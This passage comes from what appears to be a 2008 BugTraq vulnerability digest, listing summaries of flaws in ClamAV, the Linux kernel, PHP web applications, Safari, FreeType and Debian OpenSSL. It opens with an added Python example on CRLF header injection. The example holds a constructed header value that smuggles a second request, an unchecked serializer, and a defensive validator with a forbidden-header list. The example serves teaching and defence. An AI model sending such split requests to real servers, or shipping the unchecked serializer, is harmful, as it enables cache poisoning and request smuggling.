A remote attacker may leverage these classes of attacks to poison web caches, steal credentials, evade IDS signatures, and launch cross-site scripting, HTML-injection, and session-hijacking attacks. Other attacks are also possible.
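
Why a scriptable header API has to validate its input: a header value containing CR LF ends the header block early, and whatever follows it is parsed by the next hop as a second request, which is the request-splitting and cache-poisoning primitive above; letting script choose Referer is the referer-spoofing one. The following is an added example, not Internet Explorer code. It serializes a request the unchecked way, counts the messages a downstream parser would see, and then shows the check a hardened API performs: header names are RFC 7230 tokens, values carry no CR, LF or NUL, and a short list of headers cannot be set by script at all. INJECTED, FORBIDDEN and the function names are constructed for the example.

```python
import re

CRLF = b"\r\n"
# RFC 7230 token characters, the only ones allowed in a header name.
TOKEN_RE = re.compile(r"^[!#$%&'*+.^_`|~0-9A-Za-z-]+$")
# Headers a page script must never be allowed to set. Referer is on the list
# because letting script choose it is exactly the referer-spoofing attack.
FORBIDDEN = {"referer", "host", "content-length", "transfer-encoding", "connection"}

# Constructed attacker header: the value smuggles a second, complete request.
INJECTED = ("X-Tag", "x\r\n\r\nGET /admin HTTP/1.1\r\nHost: victim.example")


def serialize_unchecked(method: str, path: str, headers: list) -> bytes:
    """What a header API does if it trusts its caller: values go on the wire verbatim."""
    lines = [f"{method} {path} HTTP/1.1".encode("latin-1")]
    lines += [f"{name}: {value}".encode("latin-1") for name, value in headers]
    return CRLF.join(lines) + CRLF + CRLF


def request_lines(wire: bytes) -> list:
    """Request-line of each message a proxy or server would parse out of the byte stream."""
    messages = [m for m in wire.split(CRLF + CRLF) if m.strip()]
    return [m.split(CRLF, 1)[0].decode("latin-1") for m in messages]


class HeaderInjection(ValueError):
    """Raised for a header a script must not set, or one that would split the request."""


def check_header(name: str, value: str) -> None:
    if not TOKEN_RE.match(name):
        raise HeaderInjection(f"bad header name {name!r}")
    if name.lower() in FORBIDDEN:
        raise HeaderInjection(f"{name!r} may not be set by script")
    if any(ch in value for ch in "\r\n\x00"):
        raise HeaderInjection(f"CR, LF or NUL in value of {name!r}")


def is_safe_header(name: str, value: str) -> bool:
    try:
        check_header(name, value)
    except HeaderInjection:
        return False
    return True


def serialize_checked(method: str, path: str, headers: list) -> bytes:
    """The hardened form: every header is validated before it reaches the serializer."""
    for name, value in headers:
        check_header(name, value)
    return serialize_unchecked(method, path, headers)


if __name__ == "__main__":
    wire = serialize_unchecked("GET", "/", [("Host", "victim.example"), INJECTED])
    print(request_lines(wire))        # two request lines out of one call
    print(is_safe_header(*INJECTED))  # False
```

Rejecting the value outright, rather than stripping the CR and LF, is deliberate: a sanitizer that quietly rewrites the header leaves the caller unaware that it was fed attacker-controlled input, while an exception surfaces the attempt where it can be logged.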

27. ClamAV 'petite.c' Invalid Memory Access Denial Of Service Vulnerability
BugTraq ID: 29750
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29750
Summary:
ClamAV is prone to a denial-of-service vulnerability caused by an invalid memory access during a 'memcpy()' call.

Attackers can exploit this issue to cause denial-of-service conditions. Given the nature of this issue, remote code execution may also be possible, but this has not been confirmed.

Versions prior to ClamAV 0.93.1 are vulnerable.

28. Linux Kernel CIFS 'transport.c' Remote Buffer Overflow Vulnerability
BugTraq ID: 26438
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/26438
Summary:
The Linux kernel is prone to a remote buffer-overflow vulnerability because it fails to properly bounds-check user-supplied input before copying it into an insufficiently sized buffer.

An attacker can exploit this issue to execute arbitrary code with kernel-level privileges or cause the affected kernel to crash, denying service to legitimate users.

This issue affects version 2.6.23.1; previous versions may also be affected.

29. Linux Kernel 'fcntl_setlk()' SMP Ordering Local Denial of Service Vulnerability
BugTraq ID: 29076
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29076
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to trigger kernel crashes, denying service to legitimate users.

Versions prior to Linux kernel 2.6.25.2 and 2.4.36.4 are vulnerable.

30. Linux Kernel RLIMIT_CPU Zero Limit Handling Local Security Bypass Vulnerability
BugTraq ID: 29004
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29004
Summary:
The Linux kernel is prone to a local security-bypass vulnerability because it fails to properly handle certain RLIMIT_CPU time limitations.

Attackers can exploit this issue to bypass certain security restrictions, which may lead to further attacks.

Versions prior to Linux kernel 2.6.22 are affected.

31. Linux Kernel PowerPC 'chrp/setup.c' NULL Pointer Dereference Denial of Service Vulnerability
BugTraq ID: 27555
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/27555
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability.

Attackers can exploit this issue to crash the affected kernel, denying service to legitimate users.

This issue affects Linux kernel 2.4.21 through 2.6.18-53 running on the PowerPC architecture.

32. Linux Kernel Driver Fault Handler 'mmap.c' Local Denial of Service Vulnerability
BugTraq ID: 27705
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/27705
Summary:
The Linux kernel is prone to a local denial-of-service vulnerability because it fails to properly bounds-check certain fault handlers for device drivers.

Attackers can exploit this issue to trigger kernel crashes, denying service to legitimate users. Given the nature of this issue, attackers may also be able to execute arbitrary code, but this has not been confirmed.

Versions prior to Linux kernel 2.6.24.1 are vulnerable.

33. Linux Kernel 2.6.22.16 and Prior Multiple Memory Corruption Vulnerabilities
BugTraq ID: 27686
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/27686
Summary:
The Linux kernel is prone to multiple memory-corruption vulnerabilities due to insufficient range checking in certain fault handlers.

Local attackers could exploit these issues to cause denial-of-service conditions, bypass certain security restrictions, and potentially access sensitive information or gain elevated privileges.

These issues affect versions prior to 2.6.22.17.

34. Linux Kernel ALSA snd-page-alloc Local Proc File Information Disclosure Vulnerability
BugTraq ID: 25807
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/25807
Summary:
The Linux kernel is prone to an information-disclosure vulnerability.

Successful exploits will allow attackers to obtain portions of kernel memory. Information harvested may aid in further attacks.

Versions of the Linux kernel prior to 2.6.22.8 are vulnerable.

35. Linux Kernel 'dnotify.c' Local Race Condition Vulnerability
BugTraq ID: 29003
Remote: No
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29003
Summary:
The Linux kernel is prone to a local race-condition vulnerability.

A local attacker may exploit this issue to crash the computer or to gain elevated privileges on the affected computer.

36. Orlando CMS classes 'GLOBALS['preloc']' Parameter Multiple Remote File Include Vulnerabilities
BugTraq ID: 29820
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29820
Summary:
Orlando CMS classes is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Orlando CMS classes 0.6 is vulnerable; other versions may also be affected.

37. Apple Safari Automatic File Launch Remote Code Execution Vulnerability
BugTraq ID: 29835
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29835
Summary:
Apple Safari is prone to a remote code-execution vulnerability.

An attacker can exploit this issue by enticing an unsuspecting victim to visit a malicious webpage contained in a trusted Internet Explorer 7 zone or contained in an Internet Explorer 6 'local intranet' or 'Trusted site' zone.

Successfully exploiting this issue will allow attackers to execute arbitrary code with the privileges of the user running the affected application.

This issue affects versions prior to Apple Safari 3.1.2 running on Microsoft Windows XP and Windows Vista.

38. Apple Safari and Microsoft Windows Client-side Code Execution Vulnerability
BugTraq ID: 29445
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29445
Summary:
A vulnerability in Apple Safari on the Microsoft Windows operating system stems from a combination of security issues in Safari and all versions of Windows XP and Vista that will allow executables to be downloaded to a user's computer and run without prompting.

A vulnerability in Safari, known as the 'carpet-bombing' issue reported by Nitesh Dhanjani, allows an attacker to silently place malicious DLL files on a victim's computer. A problem in Internet Explorer, reported in December of 2006 by Aviv Raff, can then be used to run those malicious DLLs.

An attacker can exploit this issue by tricking a victim into visiting a malicious page with Safari; the malicious files will run when the victim starts Internet Explorer.

39. Mozilla Client Products Multiple Remote Vulnerabilities
BugTraq ID: 20957
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/20957
Summary:
The Mozilla Foundation has released two security advisories specifying vulnerabilities in Mozilla Firefox, SeaMonkey, and Thunderbird.

These vulnerabilities allow attackers to:

- Crash the applications and potentially execute arbitrary machine code in the context of the vulnerable applications.
- Run arbitrary JavaScript bytecode.

Other attacks may also be possible.

The issues described here will be split into individual BIDs as more information becomes available.

These issues are fixed in:

- Mozilla Firefox 1.5.0.8
- Mozilla Thunderbird 1.5.0.8
- Mozilla SeaMonkey 1.0.6

40. Fetchmail Verbose Mode Large Log Messages Remote Denial of Service Vulnerability
BugTraq ID: 29705
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29705
Summary:
Fetchmail is prone to a denial-of-service vulnerability because the application fails to handle exceptional conditions.

An attacker can exploit this issue to crash the affected application, denying service to legitimate users. Given the nature of the issue, remote code execution may also be possible, but this has not been confirmed.

Versions prior to Fetchmail 6.3.9 are vulnerable.

41. MaxTrade Trade Module SQL Injection Vulnerability
BugTraq ID: 29799
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29799
Summary:
MaxTrade is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

MaxTrade 1.3.23 is vulnerable; other versions may also be affected.

42. PHP 5 'posix_access()' Function 'safe_mode' Bypass Directory Traversal Vulnerability
BugTraq ID: 29797
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29797
Summary:
PHP is prone to a directory-traversal vulnerability because it fails to adequately sanitize user-supplied data.

Attackers can leverage this issue to bypass security restrictions enforced by 'safe_mode' to access data outside of the root webserver directory. Successful attacks may allow an attacker to access sensitive information that could aid in further attacks.

PHP 5.2.6 is vulnerable; other versions may also be affected.

43. Cisco Intrusion Prevention System (IPS) Platforms Inline Mode Denial of Service Vulnerability
BugTraq ID: 29791
Remote: Yes
Last Updated: 2008-06-20
Relevant URL: http://www.securityfocus.com/bid/29791
Summary:
Cisco Intrusion Prevention System (IPS) platforms are prone to a denial-of-service vulnerability when handling jumbo Ethernet frames.

An attacker can exploit this issue to cause a kernel panic and deny service for legitimate users.

Versions prior to Cisco Intrusion Prevention System 5.1(8)E2 and 6.0(5)E2 are vulnerable.

NOTE: This issue affects only platforms that contain gigabit network interfaces and are deployed in inline mode.

44. Apple Mac OS X ImageIO BMP/GIF Image Information Disclosure Vulnerability
BugTraq ID: 29513
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29513
Summary:
Apple Mac OS X is prone to an information-disclosure vulnerability that occurs in ImageIO.

An attacker can exploit this issue to obtain sensitive information that may lead to further attacks.

This issue affects Mac OS X 10.4.11, Mac OS X Server 10.4.11, Mac OS X 10.5 - 10.5.2, and Mac OS X Server 10.5 - 10.5.2.

NOTE: This issue was previously covered in BID 29412 (Apple Mac OS X 2008-003 Multiple Security Vulnerabilities) but has been given its own record to better document the vulnerability.

45. Microsoft Visual Basic Enterprise Edition 6 'vb6skit.dll' Remote Buffer Overflow Vulnerability
BugTraq ID: 29792
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29792
Summary:
Microsoft Visual Basic Enterprise Edition 6 is prone to a stack-based buffer-overflow vulnerability because it fails to perform adequate size checks on user-supplied input.

An attacker can exploit this issue to execute arbitrary code with the privileges of the user running the vulnerable application. Failed exploit attempts will result in a denial-of-service condition.

Microsoft Visual Basic Enterprise Edition 6 SP6 is vulnerable; other versions may also be affected.

46. X.Org X Server RENDER Extension 'ProcRenderCreateCursor()' Denial of Service Vulnerability
BugTraq ID: 29665
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29665
Summary:
X.Org X Server is prone to a denial-of-service vulnerability because the software fails to properly handle exceptional conditions.

Attackers who can connect to a vulnerable X Server may exploit this issue to crash the targeted server, denying further service to legitimate users.

47. X.Org X Server MIT-SHM Extension Information Disclosure Vulnerability
BugTraq ID: 29669
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29669
Summary:
X.Org X Server is prone to an information-disclosure vulnerability that lets X clients read arbitrary X server memory.

Attackers can exploit this issue to obtain sensitive information that may lead to further attacks.

48. X.Org X server RENDER Extension Multiple Integer Overflow Vulnerabilities
BugTraq ID: 29670
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29670
Summary:
The RENDER component for X Server is prone to multiple integer-overflow vulnerabilities because it fails to perform adequate boundary checks on user-supplied data.

Successful exploits may allow attackers to execute arbitrary code with the privileges of a user running the software. Failed exploit attempts likely cause denial-of-service conditions.

49. Microsoft Windows Bluetooth Stack Remote Code Execution Vulnerability
BugTraq ID: 29522
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29522
Summary:
Microsoft Windows is prone to a remote code-execution vulnerability because its implementation of the Bluetooth stack fails to adequately handle a flood of specially crafted SDP (Service Discovery Protocol) requests.

To exploit this issue, an attacker must be within close physical proximity of the affected computer.

Attackers can exploit this issue to execute arbitrary code with SYSTEM-level privileges. Successful exploits will completely compromise affected computers.

This issue affects only computers with Bluetooth capability.

50. UltraEdit FTP/SFTP 'LIST' Command Directory Traversal Vulnerability
BugTraq ID: 29784
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29784
Summary:
UltraEdit is prone to a directory-traversal vulnerability because the application fails to sufficiently sanitize user-supplied input. This issue occurs in the FTP/SFTP client.

Exploiting this issue will allow an attacker to write arbitrary files to locations outside of the application's current directory. This could help the attacker launch further attacks.

UltraEdit 14.00b is vulnerable; other versions may also be affected.

51. Exero CMS 'theme' Parameter Multiple Local File Include Vulnerabilities
BugTraq ID: 29788
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29788
Summary:
Exero CMS is prone to local file-include vulnerabilities because it fails to properly sanitize user-supplied input.

An attacker can exploit these vulnerabilities using directory-traversal strings to view local files in the context of the webserver process. This may aid in further attacks.

Exero CMS 1.0.0 and 1.0.1 are vulnerable; other versions may also be affected.

52. ManageEngine OpUtils 'hostName' HTML Injection Vulnerability
BugTraq ID: 29785
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29785
Summary:
ManageEngine OpUtils is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input.

Attacker-supplied HTML and script code would execute in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials or to control how the site is rendered to the user; other attacks are also possible.

ManageEngine OpUtils 5 is vulnerable; previous versions may also be affected.

53. CRE Loaded Multiple HTML Injection Vulnerabilities
BugTraq ID: 29786
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29786
Summary:
CRE Loaded is prone to multiple HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Attacker-supplied HTML or JavaScript code could run in the context of the affected site, potentially allowing the attacker to steal cookie-based authentication credentials and to control how the site is rendered to the user; other attacks are also possible.

CRE Loaded 6.2.13.1 and prior versions are vulnerable.

54. Traindepot Local File Include and Cross-Site Scripting Vulnerabilities
BugTraq ID: 29790
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29790
Summary:
Traindepot is prone to multiple local file-include vulnerabilities and a cross-site scripting vulnerability.

An attacker could exploit the local file-include issue to obtain sensitive information. Exploits of the cross-site scripting issue may allow the attacker to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may help the attacker steal cookie-based authentication credentials and launch other attacks.

Traindepot 0.1 is vulnerable; other versions may also be affected.

55. WebCalendar 'tools/send_reminders.php' Remote File Include Vulnerability
BugTraq ID: 29783
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29783
Summary:
WebCalendar is prone to a remote file-include vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker can exploit this issue to execute malicious PHP code in the context of the webserver process. This may facilitate a compromise of the application and the underlying system; other attacks are also possible.

WebCalendar 1.0.4 is vulnerable; other versions may be affected as well.

56. EroCMS 'site' parameter SQL Injection Vulnerability
BugTraq ID: 29781
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29781
Summary:
EroCMS is prone to an SQL-injection vulnerability because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

The issue affects EroCMS 1.4 and prior versions.

57. ClipShare 'group_posts.php' SQL Injection Vulnerability
BugTraq ID: 29779
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29779
Summary:
ClipShare is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Versions prior to ClipShare 3.0.1 are vulnerable.

58. Adobe Flex 3 History Management 'historyFrame.html' Cross-Site Scripting Vulnerability
BugTraq ID: 29778
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29778
Summary:
Adobe Flex 3 is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.

An attacker could exploit this vulnerability to execute arbitrary script code in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.

This issue affects Flex Builder 3, Flex SDK 3.0.1, and any applications built with Flex 3 that have enabled History Management.

59. MyShoutPro 'admin_access' Cookie Parameter Authentication Bypass Vulnerability
BugTraq ID: 29780
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29780
Summary:
MyShoutPro is prone to an authentication-bypass vulnerability because it fails to adequately verify user-supplied input used for cookie-based authentication.

An attacker can exploit this vulnerability to gain administrative access to the affected application; other attacks are also possible.

MyShoutPro 1.2 is vulnerable; other versions may also be affected.

60. easyTrade 'detail.php' SQL Injection Vulnerability
BugTraq ID: 29775
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29775
Summary:
easyTrade is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

61. PHP Site Lock 'index.php' SQL Injection Vulnerability
BugTraq ID: 29777
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29777
Summary:
PHP Site Lock is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

PHP Site Lock 2.0 is vulnerable; other versions may also be affected.

62. Foxy 'fs' Parameter Memory Exhaustion Remote Denial of Service Vulnerability
BugTraq ID: 29776
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29776
Summary:
Foxy is prone to a remote denial-of-service vulnerability because it fails to handle user-supplied input.

Attackers can exploit this issue by enticing an unsuspecting user to view a maliciously crafted webpage. Successful attacks cause the application to freeze.

63. FreeCMS 'index.php' SQL Injection Vulnerability
BugTraq ID: 29773
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29773
Summary:
FreeCMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

FreeCMS 0.2 is vulnerable; other versions may also be affected.

64. ThaiQuickCart 'PHPSESSID' Cookie Parameter Local File Include Vulnerability
BugTraq ID: 29774
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29774
Summary:
ThaiQuickCart is prone to a local file-include vulnerability because it fails to properly sanitize user-supplied input.

Exploiting this issue allows remote attackers to view local files within the context of the webserver process.

65. Basic-CMS 'index.php' SQL Injection Vulnerability
BugTraq ID: 29771
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29771
Summary:
Basic-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

66. Bizon-CMS 'photo/index.php' SQL Injection Vulnerability
BugTraq ID: 29770
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29770
Summary:
Bizon-CMS is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Bizon-CMS 2.0 is vulnerable; other versions may also be affected.

67. Comparison Engine Power 'product.detail.php' SQL Injection Vulnerability
BugTraq ID: 29768
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29768
Summary:
Comparison Engine Power is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

Comparison Engine Power 1.0 is vulnerable; other versions may also be affected.

68. Jura Internet Connectivity Kit Unauthorized Access Input-Validation Vulnerability
BugTraq ID: 29767
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29767
Summary:
Jura Internet Connectivity Kit is prone to an input-validation vulnerability that can result in unauthorized access to a computer connected to an IMPRESSA F90 or F9 coffee maker.

Successful exploits allow attackers to access an affected computer with the privileges of the user running the application. Attackers can also modify coffee maker settings in a manner sufficient to disable devices to the point that repair is required.

69. Opera Web Browser 9.27 Multiple Security Vulnerabilities
BugTraq ID: 29684
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29684
Summary:
Opera Web Browser is prone to multiple security vulnerabilities.

Exploiting these issues can allow attackers to access cross-domain image information, carry out phishing attacks, and maliciously replace the contents of trusted frames on webpages.

Versions prior to Opera 9.5 are vulnerable.

70. LifeType 'index.php' SQL Injection Vulnerability
BugTraq ID: 29495
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29495
Summary:
LifeType is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

71. photokorn 'pic' Parameter SQL Injection Vulnerability
BugTraq ID: 27627
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/27627
Summary:
The photokorn gallery is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.

Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

This issue affects photokorn 1.543; other versions may also be vulnerable.

72. Multiple Vendor HTML Form Protocol Vulnerability
BugTraq ID: 3181
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/3181
Summary:
Malicious HTML forms can submit data to any port on an arbitrary machine. This opens the potential for remote command-execution attacks originating from an unsuspecting web user who submits the form. This attack may be initiated with JavaScript when a victim views a malicious page or HTML email.

To exploit this issue, an attacker must send the malicious form data unencoded to a server that uses an ASCII-based protocol. Possible targets include SMTP, NNTP, POP3, IMAP, and IRC. Remote commands may be passed to a pertinent service by including them as form content.

This issue may allow the attacker to take advantage of a trust relationship that exists between the victim and a third party (e.g. if both the victim and the third party are located behind a firewall).

Some servers may return user-supplied data, often as part of an error message. If the user-supplied data includes JavaScript, it will be executed in the context of the server. This is a type of cross-site scripting attack and may result in the disclosure of sensitive information such as cookie data.

This issue is known to be a problem with browsers and HTML-enabled email clients, but some server implementations and proxies will accept data sent in this manner.

NOTE: An attacker may be able to circumvent browsers that prevent access to certain ports by adding 65536 to the number of the port that the attacker is sending data to.

73. OpenBSD GNU Screen Locked Authentication Bypass Vulnerability
BugTraq ID: 29810
Remote: No
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29810
Summary:
GNU Screen for OpenBSD is prone to a vulnerability that allows local attackers to bypass the locked screen password prompt.

An attacker with local physical access to the console can exploit this issue to bypass the password prompt and gain access to the locked screen session.

The issue affects GNU Screen 4.0.3 for OpenBSD 4.3; other versions may also be vulnerable.

74. Photokorn Multiple SQL Injection Vulnerabilities
BugTraq ID: 17683
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/17683
Summary:
Photokorn is prone to multiple SQL-injection vulnerabilities because the application fails to properly sanitize user-supplied input before using it in an SQL query.

A successful exploit could allow an attacker to compromise the application, access or modify data, or exploit vulnerabilities in the underlying database.

75. FreeType TrueType Font 'SHC' Heap Buffer Overflow Vulnerability
BugTraq ID: 29639
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29639
Summary:
FreeType is prone to a heap-based buffer-overflow vulnerability because the application fails to perform adequate boundary checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code within the context of the application using the FreeType library. Failed exploit attempts will result in a denial-of-service condition.

NOTE: This issue may allow a local attacker using X.Org X server to gain elevated privileges on the affected computer.

FreeType 2.3.5 is vulnerable; other versions may also be affected.

76. FreeType2 Printer Font Binary Private Dictionary Table Integer Overflow Vulnerability
BugTraq ID: 29640
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29640
Summary:
FreeType2 is prone to an integer-overflow vulnerability because it fails to perform adequate checks on user-supplied data.

An attacker can exploit this issue to execute arbitrary code within the context of applications using the FreeType2 library. Failed exploit attempts will result in a denial-of-service condition.

NOTE: This issue can allow a local attacker using X.Org X server to gain elevated privileges on the affected computer.

FreeType2 2.3.5 is vulnerable; other versions may also be affected.

77. FreeType2 Printer Font Binary Remote Code Execution Vulnerability
BugTraq ID: 29641
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29641
Summary:
FreeType2 is prone to a remote code-execution vulnerability because of an error when freeing memory.

An attacker can exploit this issue to execute arbitrary code within the context of an application using the affected library. Failed exploit attempts will result in a denial-of-service condition.

NOTE: This issue may allow a local attacker using X.Org X server to gain elevated privileges on an affected computer.

FreeType2 2.3.5 is vulnerable; other versions may also be affected.

78. Debian OpenSSL Package Random Number Generator Weakness
BugTraq ID: 29179
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29179
Summary:
The Debian OpenSSL package is prone to a random-number-generator weakness.

Attackers can exploit this issue to predict random data used to generate encryption keys by certain applications. This may help attackers compromise encryption keys and gain access to sensitive data.

This issue affects only a modified OpenSSL package for Debian prior to version 0.9.8c-4etch3.

79. BlognPlus Unspecified SQL Injection Vulnerability
BugTraq ID: 29764
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29764
Summary:
BlognPlus is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

The issue affects BlognPlus 2.5.4 and prior versions for MySQL and PostgreSQL editions.

80. AJ Auction 'id' Parameter SQL Injection Vulnerability
BugTraq ID: 29840
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29840
Summary:
AJ Auction is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

AJ Auction 1.0 is vulnerable; other versions may also be affected.

81. AJ Auction Pro 'cate_id' Parameter SQL Injection Vulnerability
BugTraq ID: 29839
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29839
Summary:
AJ Auction Pro is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data.

A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.

AJ Auction Pro, web 2.0 is vulnerable; other versions may also be affected.

82. Lotus Core CMS 'phpbb_root_path' Parameter Multiple Remote File Include Vulnerabilities
BugTraq ID: 29838
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29838
Summary:
Lotus Core CMS is prone to multiple remote file-include vulnerabilities because it fails to sufficiently sanitize user-supplied data.

Exploiting these issues can allow an attacker to compromise the application and the underlying system; other attacks are also possible.

Lotus Core CMS 1.0.1 is vulnerable; other versions may also be affected.

83. TYPO3 Frontend Filemanager Extension Unspecified Code Execution Vulnerability
BugTraq ID: 29837
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29837
Summary:
TYPO3 Frontend Filemanager extension is prone to an unspecified code-execution vulnerability.

Successful exploits allow attackers to execute arbitrary code in the context of the web server hosting the vulnerable application. This facilitates the remote compromise of affected computers.

Frontend Filemanager versions prior to 0.6.2 are vulnerable to this issue.

84. Apple Safari WebKit JavaScript Arrays Remote Buffer Overflow Vulnerability
BugTraq ID: 29836
Remote: Yes
Last Updated: 2008-06-19
Relevant URL: http://www.securityfocus.com/bid/29836
Summary:
Apple Safari WebKit is prone to a remote buffer-overflow vulnerability because it fails to perform adequate boundary checks when handling user-supplied input.

